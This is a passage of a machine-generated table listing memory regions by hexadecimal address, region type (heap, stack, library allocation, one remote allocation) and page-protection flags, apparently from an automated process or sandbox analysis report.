|
heap
|
page read and write
|
||
8850000
|
trusted library allocation
|
page read and write
|
||
4350000
|
heap
|
page read and write
|
||
4EAD000
|
trusted library allocation
|
page read and write
|
||
54FE000
|
trusted library allocation
|
page read and write
|
||
6E60000
|
trusted library allocation
|
page read and write
|
||
55D8000
|
trusted library allocation
|
page read and write
|
||
62DE000
|
stack
|
page read and write
|
||
4DA4000
|
trusted library allocation
|
page read and write
|
||
4FB6000
|
trusted library allocation
|
page read and write
|
||
9DF000
|
stack
|
page read and write
|
||
4D3D000
|
stack
|
page read and write
|
||
9EA000
|
trusted library allocation
|
page execute and read and write
|
||
8970000
|
trusted library allocation
|
page read and write
|
||
325A000
|
heap
|
page read and write
|
||
4EE9000
|
trusted library allocation
|
page read and write
|
||
5103000
|
trusted library allocation
|
page read and write
|
||
4E62000
|
trusted library allocation
|
page read and write
|
||
AE1000
|
heap
|
page read and write
|
||
55BB000
|
trusted library allocation
|
page read and write
|
||
53FD000
|
trusted library allocation
|
page read and write
|
||
5583000
|
trusted library allocation
|
page read and write
|
||
5101000
|
trusted library allocation
|
page read and write
|
||
76636C000
|
stack
|
page read and write
|
||
24F0000
|
trusted library allocation
|
page read and write
|
||
4E6A000
|
trusted library allocation
|
page read and write
|
||
4D4B000
|
trusted library allocation
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
5374000
|
trusted library allocation
|
page read and write
|
||
8A0000
|
trusted library allocation
|
page read and write
|
||
221840C6000
|
heap
|
page read and write
|
||
1B79F820000
|
heap
|
page read and write
|
||
4A4A000
|
trusted library allocation
|
page execute and read and write
|
||
7050000
|
trusted library allocation
|
page read and write
|
||
4E98000
|
trusted library allocation
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page read and write
|
||
4C85000
|
trusted library allocation
|
page read and write
|
||
6F9E000
|
stack
|
page read and write
|
||
5801000
|
trusted library allocation
|
page read and write
|
||
8230000
|
trusted library allocation
|
page execute and read and write
|
||
51A4000
|
trusted library allocation
|
page read and write
|
||
5199000
|
trusted library allocation
|
page read and write
|
||
549C000
|
trusted library allocation
|
page read and write
|
||
6FE0000
|
trusted library allocation
|
page read and write
|
||
4C7F000
|
trusted library allocation
|
page read and write
|
||
3102000
|
heap
|
page read and write
|
||
58B3000
|
trusted library allocation
|
page read and write
|
||
4D0A000
|
trusted library allocation
|
page read and write
|
||
4E8A000
|
trusted library allocation
|
page read and write
|
||
4CDE000
|
trusted library allocation
|
page read and write
|
||
5607000
|
trusted library allocation
|
page read and write
|
||
4CEF000
|
trusted library allocation
|
page read and write
|
||
58EA000
|
trusted library allocation
|
page read and write
|
||
8640000
|
trusted library allocation
|
page read and write
|
||
5383000
|
trusted library allocation
|
page read and write
|
||
4A40000
|
trusted library allocation
|
page read and write
|
||
1C7979A4000
|
heap
|
page read and write
|
||
5491000
|
trusted library allocation
|
page read and write
|
||
58BC000
|
trusted library allocation
|
page read and write
|
||
78F0000
|
trusted library allocation
|
page read and write
|
||
4D8C000
|
trusted library allocation
|
page read and write
|
||
5385000
|
trusted library allocation
|
page read and write
|
||
77DA000
|
heap
|
page read and write
|
||
7030000
|
trusted library allocation
|
page read and write
|
||
8B10000
|
trusted library allocation
|
page read and write
|
||
A75000
|
trusted library allocation
|
page execute and read and write
|
||
5892000
|
trusted library allocation
|
page read and write
|
||
53AC000
|
trusted library allocation
|
page read and write
|
||
4F3B000
|
trusted library allocation
|
page read and write
|
||
5846000
|
trusted library allocation
|
page read and write
|
||
5694000
|
trusted library allocation
|
page read and write
|
||
1C7976C0000
|
heap
|
page read and write
|
||
4D32000
|
trusted library allocation
|
page read and write
|
||
4D5A000
|
trusted library allocation
|
page read and write
|
||
54EF000
|
trusted library allocation
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
88F0000
|
trusted library section
|
page read and write
|
||
5873000
|
trusted library allocation
|
page read and write
|
||
1E13D850000
|
heap
|
page read and write
|
||
FD2FCFF000
|
stack
|
page read and write
|
||
783F000
|
heap
|
page read and write
|
||
53E2000
|
trusted library allocation
|
page read and write
|
||
B11000
|
heap
|
page read and write
|
||
2799000
|
trusted library allocation
|
page read and write
|
||
249E000
|
stack
|
page read and write
|
||
5370000
|
trusted library allocation
|
page read and write
|
||
6039000
|
trusted library allocation
|
page read and write
|
||
4E3A000
|
trusted library allocation
|
page read and write
|
||
1E13D7C0000
|
heap
|
page read and write
|
||
2776000
|
trusted library allocation
|
page read and write
|
||
7B60000
|
trusted library allocation
|
page execute and read and write
|
||
543C000
|
trusted library allocation
|
page read and write
|
||
5429000
|
trusted library allocation
|
page read and write
|
||
3F0000
|
unkown
|
page readonly
|
||
FD2F56A000
|
stack
|
page read and write
|
||
28C0000
|
trusted library allocation
|
page read and write
|
||
2FAE000
|
stack
|
page read and write
|
||
4CDC000
|
trusted library allocation
|
page read and write
|
||
321F000
|
stack
|
page read and write
|
||
85CE000
|
stack
|
page read and write
|
||
54BB000
|
trusted library allocation
|
page read and write
|
||
FD301FB000
|
stack
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
AF0000
|
trusted library allocation
|
page read and write
|
||
9F5000
|
trusted library allocation
|
page execute and read and write
|
||
6760000
|
trusted library allocation
|
page execute and read and write
|
||
7890000
|
trusted library allocation
|
page read and write
|
||
5D80000
|
trusted library allocation
|
page read and write
|
||
4CB7000
|
trusted library allocation
|
page read and write
|
||
77B1000
|
heap
|
page read and write
|
||
3711000
|
trusted library allocation
|
page read and write
|
||
4B76000
|
trusted library allocation
|
page read and write
|
||
4E3C000
|
trusted library allocation
|
page read and write
|
||
39267E000
|
stack
|
page read and write
|
||
84F0000
|
trusted library allocation
|
page execute and read and write
|
||
564F000
|
trusted library allocation
|
page read and write
|
||
71FE000
|
stack
|
page read and write
|
||
8CD000
|
heap
|
page read and write
|
||
5D90000
|
trusted library allocation
|
page execute and read and write
|
||
7666FF000
|
stack
|
page read and write
|
||
277F000
|
trusted library allocation
|
page read and write
|
||
A90000
|
trusted library allocation
|
page read and write
|
||
5FD9000
|
trusted library allocation
|
page read and write
|
||
22184040000
|
heap
|
page read and write
|
||
4D7E000
|
stack
|
page read and write
|
||
4D74000
|
trusted library allocation
|
page read and write
|
||
4D6C000
|
trusted library allocation
|
page read and write
|
||
4D4F000
|
trusted library allocation
|
page read and write
|
||
4EE3000
|
trusted library allocation
|
page read and write
|
||
8980000
|
trusted library allocation
|
page execute and read and write
|
||
4ECC000
|
stack
|
page read and write
|
||
286E000
|
trusted library allocation
|
page read and write
|
||
5FAD000
|
stack
|
page read and write
|
||
556C000
|
trusted library allocation
|
page read and write
|
||
5372000
|
trusted library allocation
|
page read and write
|
||
2808000
|
trusted library allocation
|
page read and write
|
||
1C7977B0000
|
heap
|
page read and write
|
||
3F1000
|
unkown
|
page execute read
|
||
428E000
|
stack
|
page read and write
|
||
39239F000
|
stack
|
page read and write
|
||
569A000
|
trusted library allocation
|
page read and write
|
||
1E13D860000
|
heap
|
page read and write
|
||
AED000
|
heap
|
page read and write
|
||
5649000
|
trusted library allocation
|
page read and write
|
||
2FED000
|
stack
|
page read and write
|
||
4DE9000
|
trusted library allocation
|
page read and write
|
||
4DED000
|
trusted library allocation
|
page read and write
|
||
7460000
|
heap
|
page read and write
|
||
55CC000
|
trusted library allocation
|
page read and write
|
||
5690000
|
trusted library allocation
|
page read and write
|
||
4FC7000
|
heap
|
page read and write
|
||
2A00000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page read and write
|
||
5114000
|
trusted library allocation
|
page read and write
|
||
4EB1000
|
trusted library allocation
|
page read and write
|
||
5381000
|
trusted library allocation
|
page read and write
|
||
2790000
|
trusted library allocation
|
page read and write
|
||
7B4E000
|
stack
|
page read and write
|
||
4D2E000
|
trusted library allocation
|
page read and write
|
||
4CEB000
|
trusted library allocation
|
page read and write
|
||
C40000
|
trusted library allocation
|
page execute and read and write
|
||
699B000
|
stack
|
page read and write
|
||
5585000
|
trusted library allocation
|
page read and write
|
||
1FEEE415000
|
heap
|
page read and write
|
||
659E000
|
stack
|
page read and write
|
||
4CF3000
|
trusted library allocation
|
page read and write
|
||
4F60000
|
trusted library allocation
|
page read and write
|
||
5884000
|
trusted library allocation
|
page read and write
|
||
53E0000
|
trusted library allocation
|
page read and write
|
||
57F9000
|
trusted library allocation
|
page read and write
|
||
A66000
|
trusted library allocation
|
page execute and read and write
|
||
53B4000
|
trusted library allocation
|
page read and write
|
||
6080000
|
trusted library allocation
|
page execute and read and write
|
||
85D0000
|
heap
|
page read and write
|
||
DF0000
|
heap
|
page execute and read and write
|
||
9F7000
|
trusted library allocation
|
page execute and read and write
|
||
2711000
|
trusted library allocation
|
page read and write
|
||
7D00000
|
trusted library allocation
|
page read and write
|
||
84E000
|
stack
|
page read and write
|
||
5568000
|
trusted library allocation
|
page read and write
|
||
8AC0000
|
trusted library allocation
|
page read and write
|
||
8B40000
|
trusted library allocation
|
page read and write
|
||
58DB000
|
trusted library allocation
|
page read and write
|
||
C1F000
|
stack
|
page read and write
|
||
53CD000
|
trusted library allocation
|
page read and write
|
||
6D0D000
|
trusted library allocation
|
page read and write
|
||
B3A000
|
heap
|
page read and write
|
||
70E0000
|
heap
|
page execute and read and write
|
||
8510000
|
heap
|
page read and write
|
||
797E000
|
stack
|
page read and write
|
||
4A24000
|
trusted library allocation
|
page read and write
|
||
2930000
|
heap
|
page read and write
|
||
4E92000
|
trusted library allocation
|
page read and write
|
||
7B70000
|
heap
|
page read and write
|
||
6F9000
|
stack
|
page read and write
|
||
1E13D7E0000
|
heap
|
page read and write
|
||
63EE000
|
stack
|
page read and write
|
||
5651000
|
trusted library allocation
|
page read and write
|
||
5692000
|
trusted library allocation
|
page read and write
|
||
6687000
|
trusted library allocation
|
page read and write
|
||
584C000
|
trusted library allocation
|
page read and write
|
||
9E6000
|
trusted library allocation
|
page execute and read and write
|
||
55B7000
|
trusted library allocation
|
page read and write
|
||
4F39000
|
trusted library allocation
|
page read and write
|
||
5D64000
|
trusted library allocation
|
page read and write
|
||
4EB5000
|
trusted library allocation
|
page read and write
|
||
4ECA000
|
trusted library allocation
|
page read and write
|
||
4CBD000
|
trusted library allocation
|
page read and write
|
||
5660000
|
trusted library allocation
|
page read and write
|
||
1B79FAB0000
|
heap
|
page read and write
|
||
6ED0000
|
trusted library allocation
|
page read and write
|
||
8B22000
|
trusted library allocation
|
page read and write
|
||
880000
|
trusted library allocation
|
page read and write
|
||
4E9A000
|
trusted library allocation
|
page read and write
|
||
1C7977B7000
|
heap
|
page read and write
|
||
287A000
|
trusted library allocation
|
page read and write
|
||
7B4C000
|
stack
|
page read and write
|
||
5F20000
|
trusted library allocation
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
241000
|
unkown
|
page execute read
|
||
4A00000
|
trusted library section
|
page read and write
|
||
2762000
|
trusted library allocation
|
page read and write
|
||
6096000
|
trusted library allocation
|
page read and write
|
||
6090000
|
trusted library allocation
|
page read and write
|
||
55ED000
|
trusted library allocation
|
page read and write
|
||
6D7E000
|
heap
|
page read and write
|
||
7F80000
|
trusted library allocation
|
page read and write
|
||
5542000
|
trusted library allocation
|
page read and write
|
||
76667F000
|
stack
|
page read and write
|
||
285C000
|
stack
|
page read and write
|
||
5602000
|
trusted library allocation
|
page read and write
|
||
24D0000
|
trusted library section
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
B07000
|
heap
|
page read and write
|
||
E00000
|
trusted library allocation
|
page read and write
|
||
2519000
|
trusted library allocation
|
page read and write
|
||
3819000
|
trusted library allocation
|
page read and write
|
||
78E9000
|
trusted library allocation
|
page read and write
|
||
6E90000
|
trusted library allocation
|
page read and write
|
||
5F4E000
|
trusted library allocation
|
page read and write
|
||
6F1E000
|
stack
|
page read and write
|
||
58C0000
|
trusted library allocation
|
page read and write
|
||
4F0E000
|
stack
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page write copy
|
||
5C3E000
|
stack
|
page read and write
|
||
870000
|
trusted library allocation
|
page read and write
|
||
4DEB000
|
trusted library allocation
|
page read and write
|
||
4EB7000
|
trusted library allocation
|
page read and write
|
||
4D25000
|
trusted library allocation
|
page read and write
|
||
4CA2000
|
trusted library allocation
|
page read and write
|
||
2560000
|
heap
|
page readonly
|
||
301B000
|
heap
|
page read and write
|
||
5416000
|
trusted library allocation
|
page read and write
|
||
51AE000
|
trusted library allocation
|
page read and write
|
||
5423000
|
trusted library allocation
|
page read and write
|
||
506C000
|
trusted library allocation
|
page read and write
|
||
4D7F000
|
trusted library allocation
|
page read and write
|
||
22184070000
|
heap
|
page read and write
|
||
480E000
|
stack
|
page read and write
|
||
55C4000
|
trusted library allocation
|
page read and write
|
||
4D00000
|
trusted library allocation
|
page read and write
|
||
420F000
|
stack
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page read and write
|
||
4DFC000
|
stack
|
page read and write
|
||
4BC0000
|
heap
|
page read and write
|
||
4FC0000
|
heap
|
page read and write
|
||
4CC3000
|
trusted library allocation
|
page read and write
|
||
4E64000
|
trusted library allocation
|
page read and write
|
||
5F50000
|
trusted library allocation
|
page read and write
|
||
567F000
|
trusted library allocation
|
page read and write
|
||
8B3000
|
trusted library allocation
|
page execute and read and write
|
||
5FA0000
|
heap
|
page read and write
|
||
700E000
|
stack
|
page read and write
|
||
7A70000
|
trusted library allocation
|
page read and write
|
||
5D40000
|
trusted library allocation
|
page read and write
|
||
4D92000
|
trusted library allocation
|
page read and write
|
||
3739000
|
trusted library allocation
|
page read and write
|
||
5476000
|
trusted library allocation
|
page read and write
|
||
1FEEE1A7000
|
heap
|
page read and write
|
||
5D73000
|
trusted library allocation
|
page read and write
|
||
4A2D000
|
trusted library allocation
|
page execute and read and write
|
||
78C0000
|
trusted library allocation
|
page read and write
|
||
4D53000
|
trusted library allocation
|
page read and write
|
||
4D3F000
|
trusted library allocation
|
page read and write
|
||
4E08000
|
heap
|
page read and write
|
||
57FD000
|
trusted library allocation
|
page read and write
|
||
4B56000
|
trusted library allocation
|
page read and write
|
||
87D000
|
trusted library allocation
|
page execute and read and write
|
||
54D6000
|
trusted library allocation
|
page read and write
|
||
53FF000
|
trusted library allocation
|
page read and write
|
||
4F75000
|
trusted library allocation
|
page read and write
|
||
5F10000
|
heap
|
page read and write
|
||
3CA000
|
stack
|
page read and write
|
||
54DA000
|
trusted library allocation
|
page read and write
|
||
57F7000
|
trusted library allocation
|
page read and write
|
||
5446000
|
trusted library allocation
|
page read and write
|
||
279C000
|
trusted library allocation
|
page read and write
|
||
58E1000
|
trusted library allocation
|
page read and write
|
||
5604000
|
trusted library allocation
|
page read and write
|
||
4C8A000
|
trusted library allocation
|
page read and write
|
||
1C7979A0000
|
heap
|
page read and write
|
||
8AF0000
|
trusted library allocation
|
page read and write
|
||
543A000
|
trusted library allocation
|
page read and write
|
||
2750000
|
trusted library allocation
|
page read and write
|
||
4F4E000
|
trusted library allocation
|
page read and write
|
||
4E4F000
|
trusted library allocation
|
page read and write
|
||
4F10000
|
trusted library allocation
|
page read and write
|
||
58E3000
|
trusted library allocation
|
page read and write
|
||
71BB000
|
stack
|
page read and write
|
||
5393000
|
trusted library allocation
|
page read and write
|
||
A77000
|
trusted library allocation
|
page execute and read and write
|
||
54AE000
|
trusted library allocation
|
page read and write
|
||
4CA4000
|
trusted library allocation
|
page read and write
|
||
24B0000
|
heap
|
page read and write
|
||
2776000
|
trusted library allocation
|
page read and write
|
||
7A80000
|
trusted library allocation
|
page read and write
|
||
4D81000
|
trusted library allocation
|
page read and write
|
||
5DE0000
|
trusted library allocation
|
page read and write
|
||
5875000
|
trusted library allocation
|
page read and write
|
||
55D2000
|
trusted library allocation
|
page read and write
|
||
4903000
|
trusted library allocation
|
page read and write
|
||
4E38000
|
trusted library allocation
|
page read and write
|
||
9F2000
|
trusted library allocation
|
page read and write
|
||
25BE000
|
stack
|
page read and write
|
||
4D93000
|
heap
|
page read and write
|
||
7010000
|
trusted library allocation
|
page read and write
|
||
230000
|
heap
|
page read and write
|
||
8860000
|
heap
|
page read and write
|
||
4F5C000
|
trusted library allocation
|
page read and write
|
||
6DD4000
|
heap
|
page read and write
|
||
454000
|
unkown
|
page readonly
|
||
22183EE0000
|
heap
|
page read and write
|
||
4F5E000
|
trusted library allocation
|
page read and write
|
||
8680000
|
trusted library allocation
|
page read and write
|
||
558B000
|
trusted library allocation
|
page read and write
|
||
FD2FDF8000
|
stack
|
page read and write
|
||
4880000
|
trusted library allocation
|
page read and write
|
||
402000
|
unkown
|
page readonly
|
||
4A39000
|
trusted library allocation
|
page read and write
|
||
2EA8000
|
stack
|
page read and write
|
||
28B0000
|
trusted library allocation
|
page execute and read and write
|
||
8D0000
|
heap
|
page read and write
|
||
2522000
|
trusted library allocation
|
page read and write
|
||
5852000
|
trusted library allocation
|
page read and write
|
||
5AFB000
|
stack
|
page read and write
|
||
8B50000
|
trusted library allocation
|
page execute and read and write
|
||
4E32000
|
trusted library allocation
|
page read and write
|
||
2F67000
|
heap
|
page read and write
|
||
9FB000
|
trusted library allocation
|
page execute and read and write
|
||
DE6000
|
trusted library allocation
|
page read and write
|
||
1C7977D1000
|
heap
|
page read and write
|
||
53B0000
|
trusted library allocation
|
page read and write
|
||
53D6000
|
trusted library allocation
|
page read and write
|
||
868A000
|
trusted library allocation
|
page read and write
|
||
54FB000
|
trusted library allocation
|
page read and write
|
||
534E000
|
stack
|
page read and write
|
||
4C59000
|
trusted library allocation
|
page read and write
|
||
80B0000
|
trusted library allocation
|
page read and write
|
||
78A0000
|
trusted library allocation
|
page execute and read and write
|
||
53B2000
|
trusted library allocation
|
page read and write
|
||
584A000
|
trusted library allocation
|
page read and write
|
||
1FEEE130000
|
heap
|
page read and write
|
||
5681000
|
trusted library allocation
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
54F3000
|
trusted library allocation
|
page read and write
|
||
6760000
|
heap
|
page read and write
|
||
79FE000
|
stack
|
page read and write
|
||
5525000
|
trusted library allocation
|
page read and write
|
||
1E13D6E0000
|
heap
|
page read and write
|
||
5F9F000
|
stack
|
page read and write
|
||
4E2E000
|
trusted library allocation
|
page read and write
|
||
277D000
|
trusted library allocation
|
page read and write
|
||
5592000
|
trusted library allocation
|
page read and write
|
||
51B8000
|
trusted library allocation
|
page read and write
|
||
98A000
|
heap
|
page read and write
|
||
552E000
|
trusted library allocation
|
page read and write
|
||
4EC6000
|
trusted library allocation
|
page read and write
|
||
257A000
|
heap
|
page read and write
|
||
53B8000
|
trusted library allocation
|
page read and write
|
||
54CC000
|
trusted library allocation
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
5125000
|
trusted library allocation
|
page read and write
|
||
51BA000
|
trusted library allocation
|
page read and write
|
||
8C20000
|
trusted library allocation
|
page execute and read and write
|
||
9E0000
|
trusted library allocation
|
page read and write
|
||
558E000
|
trusted library allocation
|
page read and write
|
||
4DA7000
|
trusted library allocation
|
page read and write
|
||
53DE000
|
trusted library allocation
|
page read and write
|
||
22184090000
|
heap
|
page read and write
|
||
7770000
|
heap
|
page read and write
|
||
5679000
|
trusted library allocation
|
page read and write
|
||
55D6000
|
trusted library allocation
|
page read and write
|
||
7A80000
|
trusted library allocation
|
page execute and read and write
|
||
7080000
|
trusted library allocation
|
page read and write
|
||
5940000
|
heap
|
page read and write
|
||
4D55000
|
trusted library allocation
|
page read and write
|
||
4DE5000
|
heap
|
page read and write
|
||
7090000
|
trusted library allocation
|
page read and write
|
||
4DA0000
|
heap
|
page read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
4DE7000
|
heap
|
page read and write
|
||
695E000
|
stack
|
page read and write
|
||
5920000
|
heap
|
page read and write
|
||
4B6A000
|
trusted library allocation
|
page read and write
|
||
5865000
|
trusted library allocation
|
page read and write
|
||
636E000
|
stack
|
page read and write
|
||
555B000
|
trusted library allocation
|
page read and write
|
||
6FF0000
|
trusted library allocation
|
page read and write
|
||
4CF0000
|
heap
|
page execute and read and write
|
||
8C70000
|
heap
|
page read and write
|
||
56BE000
|
trusted library allocation
|
page read and write
|
||
5448000
|
trusted library allocation
|
page read and write
|
||
4CA0000
|
trusted library allocation
|
page read and write
|
||
4CD6000
|
trusted library allocation
|
page read and write
|
||
5632000
|
trusted library allocation
|
page read and write
|
||
4F92000
|
trusted library allocation
|
page read and write
|
||
502B000
|
trusted library allocation
|
page read and write
|
||
4ABE000
|
stack
|
page read and write
|
||
92D2000
|
trusted library allocation
|
page read and write
|
||
511A000
|
trusted library allocation
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
4F58000
|
trusted library allocation
|
page read and write
|
||
8240000
|
trusted library allocation
|
page execute and read and write
|
||
70CE000
|
stack
|
page read and write
|
||
DE0000
|
trusted library allocation
|
page read and write
|
||
5675000
|
trusted library allocation
|
page read and write
|
||
472D000
|
stack
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
1B79F898000
|
heap
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page read and write
|
||
4E34000
|
trusted library allocation
|
page read and write
|
||
8BD000
|
trusted library allocation
|
page execute and read and write
|
||
A62000
|
trusted library allocation
|
page read and write
|
||
4E06000
|
trusted library allocation
|
page read and write
|
||
5FB0000
|
trusted library allocation
|
page read and write
|
||
8520000
|
trusted library allocation
|
page read and write
|
||
53FB000
|
trusted library allocation
|
page read and write
|
||
92B0000
|
trusted library allocation
|
page execute and read and write
|
||
5F5D000
|
stack
|
page read and write
|
||
8140000
|
trusted library allocation
|
page read and write
|
||
6FDD000
|
stack
|
page read and write
|
||
3220000
|
heap
|
page read and write
|
||
55EF000
|
trusted library allocation
|
page read and write
|
||
A72000
|
trusted library allocation
|
page read and write
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
564B000
|
trusted library allocation
|
page read and write
|
||
92D0000
|
trusted library allocation
|
page read and write
|
||
309D000
|
heap
|
page read and write
|
||
5512000
|
trusted library allocation
|
page read and write
|
||
73CA000
|
stack
|
page read and write
|
||
C60000
|
trusted library allocation
|
page read and write
|
||
51A8000
|
trusted library allocation
|
page read and write
|
||
4C5B000
|
trusted library allocation
|
page read and write
|
||
2526000
|
trusted library allocation
|
page execute and read and write
|
||
519B000
|
trusted library allocation
|
page read and write
|
||
4F54000
|
trusted library allocation
|
page read and write
|
||
501E000
|
stack
|
page read and write
|
||
4E51000
|
trusted library allocation
|
page read and write
|
||
53C9000
|
trusted library allocation
|
page read and write
|
||
AEA000
|
heap
|
page read and write
|
||
4EB3000
|
trusted library allocation
|
page read and write
|
||
7AD0000
|
trusted library allocation
|
page read and write
|
||
5A4D000
|
trusted library allocation
|
page read and write
|
||
1B79F89A000
|
heap
|
page read and write
|
||
51A0000
|
trusted library allocation
|
page read and write
|
||
58C8000
|
trusted library allocation
|
page read and write
|
||
612E000
|
stack
|
page read and write
|
||
5559000
|
trusted library allocation
|
page read and write
|
||
4D90000
|
heap
|
page read and write
|
||
575A000
|
trusted library allocation
|
page read and write
|
||
54C8000
|
trusted library allocation
|
page read and write
|
||
4C6A000
|
trusted library allocation
|
page read and write
|
||
2504000
|
trusted library allocation
|
page read and write
|
||
2861000
|
trusted library allocation
|
page read and write
|
||
51B4000
|
trusted library allocation
|
page read and write
|
||
4DF2000
|
trusted library allocation
|
page read and write
|
||
58C6000
|
trusted library allocation
|
page read and write
|
||
4DF8000
|
trusted library allocation
|
page read and write
|
||
7CFF000
|
stack
|
page read and write
|
||
FD300FF000
|
stack
|
page read and write
|
||
4887000
|
trusted library allocation
|
page read and write
|
||
5191000
|
trusted library allocation
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
511C000
|
trusted library allocation
|
page read and write
|
||
4F02000
|
trusted library allocation
|
page read and write
|
||
B10000
|
heap
|
page read and write
|
||
7663EE000
|
stack
|
page read and write
|
||
54F1000
|
trusted library allocation
|
page read and write
|
||
56C4000
|
trusted library allocation
|
page read and write
|
||
66F5000
|
trusted library allocation
|
page read and write
|
||
5A47000
|
trusted library allocation
|
page read and write
|
||
4CBF000
|
trusted library allocation
|
page read and write
|
||
68DE000
|
stack
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
50FD000
|
trusted library allocation
|
page read and write
|
||
380000
|
remote allocation
|
page execute and read and write
|
||
7AD3000
|
trusted library allocation
|
page read and write
|
||
78B2000
|
trusted library allocation
|
page read and write
|
||
5645000
|
trusted library allocation
|
page read and write
|
||
4CF5000
|
trusted library allocation
|
page read and write
|
||
4C57000
|
trusted library allocation
|
page read and write
|
||
615D000
|
stack
|
page read and write
|
||
5D50000
|
trusted library allocation
|
page read and write
|
||
941F000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
trusted library allocation
|
page read and write
|
||
4D3C000
|
trusted library allocation
|
page read and write
|
||
2520000
|
trusted library allocation
|
page read and write
|
||
5662000
|
trusted library allocation
|
page read and write
|
||
26FC000
|
stack
|
page read and write
|
||
4C4F000
|
trusted library allocation
|
page read and write
|
||
4EE1000
|
trusted library allocation
|
page read and write
|
||
424E000
|
stack
|
page read and write
|
||
4C53000
|
trusted library allocation
|
page read and write
|
||
4A70000
|
trusted library allocation
|
page read and write
|
||
649E000
|
stack
|
page read and write
|
||
1C7977C2000
|
heap
|
page read and write
|
||
588C000
|
trusted library allocation
|
page read and write
|
||
4FC9000
|
trusted library allocation
|
page read and write
|
||
4D98000
|
trusted library allocation
|
page read and write
|
||
489B000
|
heap
|
page read and write
|
||
4EE5000
|
trusted library allocation
|
page read and write
|
||
2855000
|
trusted library allocation
|
page read and write
|
||
47EE000
|
stack
|
page read and write
|
||
4A50000
|
trusted library allocation
|
page read and write
|
||
7070000
|
trusted library allocation
|
page read and write
|
||
55AA000
|
trusted library allocation
|
page read and write
|
||
4B6E000
|
trusted library allocation
|
page read and write
|
||
556A000
|
trusted library allocation
|
page read and write
|
||
4B90000
|
heap
|
page execute and read and write
|
||
251000
|
unkown
|
page read and write
|
||
617E000
|
trusted library allocation
|
page read and write
|
||
4E9E000
|
trusted library allocation
|
page read and write
|
||
581A000
|
trusted library allocation
|
page read and write
|
||
8876000
|
heap
|
page read and write
|
||
727E000
|
stack
|
page read and write
|
||
84E0000
|
heap
|
page read and write
|
||
4DE2000
|
heap
|
page read and write
|
||
58CD000
|
trusted library allocation
|
page read and write
|
||
631E000
|
stack
|
page read and write
|
||
8B4000
|
trusted library allocation
|
page read and write
|
||
4DFC000
|
trusted library allocation
|
page read and write
|
||
860000
|
trusted library allocation
|
page read and write
|
||
5540000
|
trusted library allocation
|
page read and write
|
||
7B0E000
|
stack
|
page read and write
|
||
7060000
|
trusted library allocation
|
page read and write
|
||
4EEE000
|
trusted library allocation
|
page read and write
|
||
51DF000
|
stack
|
page read and write
|
||
5890000
|
trusted library allocation
|
page read and write
|
||
7BFE000
|
stack
|
page read and write
|
||
969000
|
heap
|
page read and write
|
||
27A6000
|
trusted library allocation
|
page read and write
|
||
4D1D000
|
trusted library allocation
|
page read and write
|
||
6D4B000
|
heap
|
page read and write
|
||
8940000
|
trusted library section
|
page read and write
|
||
7A66000
|
stack
|
page read and write
|
||
A9C000
|
stack
|
page read and write
|
||
4B00000
|
heap
|
page readonly
|
||
4CA8000
|
trusted library allocation
|
page read and write
|
||
5546000
|
trusted library allocation
|
page read and write
|
||
5898000
|
trusted library allocation
|
page read and write
|
||
64ED000
|
stack
|
page read and write
|
||
4F86000
|
trusted library allocation
|
page read and write
|
||
5598000
|
trusted library allocation
|
page read and write
|
||
5803000
|
trusted library allocation
|
page read and write
|
||
4DE3000
|
trusted library allocation
|
page read and write
|
||
E10000
|
heap
|
page read and write
|
||
8C30000
|
trusted library allocation
|
page execute and read and write
|
||
562E000
|
trusted library allocation
|
page read and write
|
||
5848000
|
trusted library allocation
|
page read and write
|
||
5472000
|
trusted library allocation
|
page read and write
|
||
7F1E0000
|
trusted library allocation
|
page execute and read and write
|
||
7B00000
|
trusted library allocation
|
page read and write
|
||
1C7978B0000
|
heap
|
page read and write
|
||
80D0000
|
trusted library allocation
|
page read and write
|
||
6E70000
|
trusted library allocation
|
page read and write
|
||
5867000
|
trusted library allocation
|
page read and write
|
||
55D0000
|
trusted library allocation
|
page read and write
|
||
4D96000
|
trusted library allocation
|
page read and write
|
||
5425000
|
trusted library allocation
|
page read and write
|
||
486A000
|
stack
|
page read and write
|
||
5871000
|
trusted library allocation
|
page read and write
|
||
54B9000
|
trusted library allocation
|
page read and write
|
||
7000000
|
trusted library allocation
|
page read and write
|
||
6F5F000
|
stack
|
page read and write
|
||
5677000
|
trusted library allocation
|
page read and write
|
||
511E000
|
trusted library allocation
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
FD2FEFD000
|
stack
|
page read and write
|
||
2550000
|
trusted library allocation
|
page read and write
|
||
2781000
|
trusted library allocation
|
page read and write
|
||
88D000
|
trusted library allocation
|
page execute and read and write
|
||
5587000
|
trusted library allocation
|
page read and write
|
||
4E36000
|
trusted library allocation
|
page read and write
|
||
2503000
|
trusted library allocation
|
page execute and read and write
|
||
5F43000
|
trusted library allocation
|
page read and write
|
||
5635000
|
trusted library allocation
|
page read and write
|
||
4ECE000
|
trusted library allocation
|
page read and write
|
||
5FEE000
|
trusted library allocation
|
page read and write
|
||
6826D7E000
|
stack
|
page read and write
|
||
5D3E000
|
stack
|
page read and write
|
||
6BCE000
|
stack
|
page read and write
|
||
4E02000
|
trusted library allocation
|
page read and write
|
||
276A000
|
trusted library allocation
|
page read and write
|
||
275E000
|
trusted library allocation
|
page read and write
|
||
6826CFF000
|
stack
|
page read and write
|
||
592C000
|
heap
|
page read and write
|
||
93A0000
|
trusted library allocation
|
page execute and read and write
|
||
4F94000
|
trusted library allocation
|
page read and write
|
